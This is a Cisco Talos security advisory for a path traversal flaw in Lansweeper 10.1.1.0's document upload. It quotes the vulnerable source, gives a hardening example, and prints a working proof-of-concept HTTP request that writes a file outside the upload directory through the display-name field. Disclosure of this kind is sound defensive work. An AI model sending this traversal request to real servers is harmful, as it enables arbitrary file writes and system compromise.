CVE-2022-32573: TALOS-2022-1528 || Cisco Talos Intelligence Group

SUMMARY

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability exists in the action reached via Assets -> choose any asset -> Docs -> Add document. The code is located inside the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code:

Line 1  else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2  {
Line 3 
Line 4      if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5      {
Line 6          string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7          string text6 = Guid.NewGuid().ToString();
Line 8          int value6 = int.Parse(current.Request["assetId"]);
Line 9          string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10         WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11         string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12         string[] allowedExtensions = General.AllowedExtensions;
Line 13         string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14         if (txtdocname.Text != "")
Line 15         {
Line 16             text5 = txtdocname.Text + text8;
Line 17         }
Line 18         bool flag = false;
Line 19         string[] array = allowedExtensions;
Line 20         for (int i = 0; i < array.Length; i++)
Line 21         {
Line 22             if (array[i] == text8)
Line 23             {
Line 24                 flag = true;
Line 25             }
Line 26         }
Line 27         string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28         string filename = text9 + text6 + "_" + text5;
Line 29         if (!Directory.Exists(text9))
Line 30         {
Line 31             Directory.CreateDirectory(text9);
Line 32         }
Line 33         try
Line 34         {
Line 35             if (!flag)
Line 36             {
Line 37                 text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38                 throw new CustomException(text4);
Line 39             }
Line 40             fileup.PostedFile.SaveAs(filename);

When uploading a file (document), an attacker can use the txtdocname variable (Display name in the web GUI) to provide an alternative filename, which is not sanitized at all against directory traversal. Although line 6 strips directory components from the uploaded filename with Path.GetFileName, line 16 replaces that value with txtdocname.Text plus the extension whenever a display name is supplied. That name is then simply concatenated with the path to the DOCS directory (lines 27-28). The lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.
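
One way to close the gap described above, shown as an added example (not Lansweeper's code and not the vendor's patch): treat the display name as a label rather than a path, then confirm the canonical destination still sits under DOCS before saving. The names DocUpload, ResolveDocPath and docsRoot are hypothetical, and the sample root in Main is constructed.

```csharp
using System;
using System.IO;

// Added example: hypothetical helper, not taken from AssetActions.cs.
static class DocUpload
{
    // Builds the on-disk path for an uploaded document and refuses any
    // display name that would place the file outside docsRoot.
    public static string ResolveDocPath(string docsRoot, string displayName, string extension)
    {
        // 1. Reject separators, drive/stream colons and other invalid filename characters.
        if (string.IsNullOrWhiteSpace(displayName) ||
            displayName.IndexOfAny(new[] { '\\', '/', ':' }) >= 0 ||
            displayName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
        {
            throw new ArgumentException("Display name must not contain path characters.");
        }

        // 2. Canonicalize root and candidate, then require the candidate to stay under the root.
        string root = Path.GetFullPath(docsRoot);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString(), StringComparison.Ordinal))
            root += Path.DirectorySeparatorChar;

        string candidate = Path.GetFullPath(
            Path.Combine(root, Guid.NewGuid().ToString() + "_" + displayName + extension));

        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("Resolved path escapes the DOCS directory.");

        return candidate;
    }

    static void Main()
    {
        string docsRoot = Path.Combine(Path.GetTempPath(), "DOCS"); // constructed sample root
        foreach (string name in new[] { "Q3 inventory", @"..\..\..\HACKED" })
        {
            try
            {
                Console.WriteLine("accepted: " + ResolveDocPath(docsRoot, name, ".ini"));
            }
            catch (Exception ex) when (ex is ArgumentException || ex is UnauthorizedAccessException)
            {
                Console.WriteLine("rejected '" + name + "': " + ex.Message);
            }
        }
    }
}
```

The second check is kept even though the first already rejects the txtdocname value from the request below, so that a later change to the name filter cannot silently reopen the traversal.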

Exploit Proof of Concept

REQUEST

POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint

ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"

..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"

Upload
-----------------------------23614898975253108242957970650--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159

<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>

TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Discovered by Marcin ‘Icewall’ Noga of Cisco Talos.
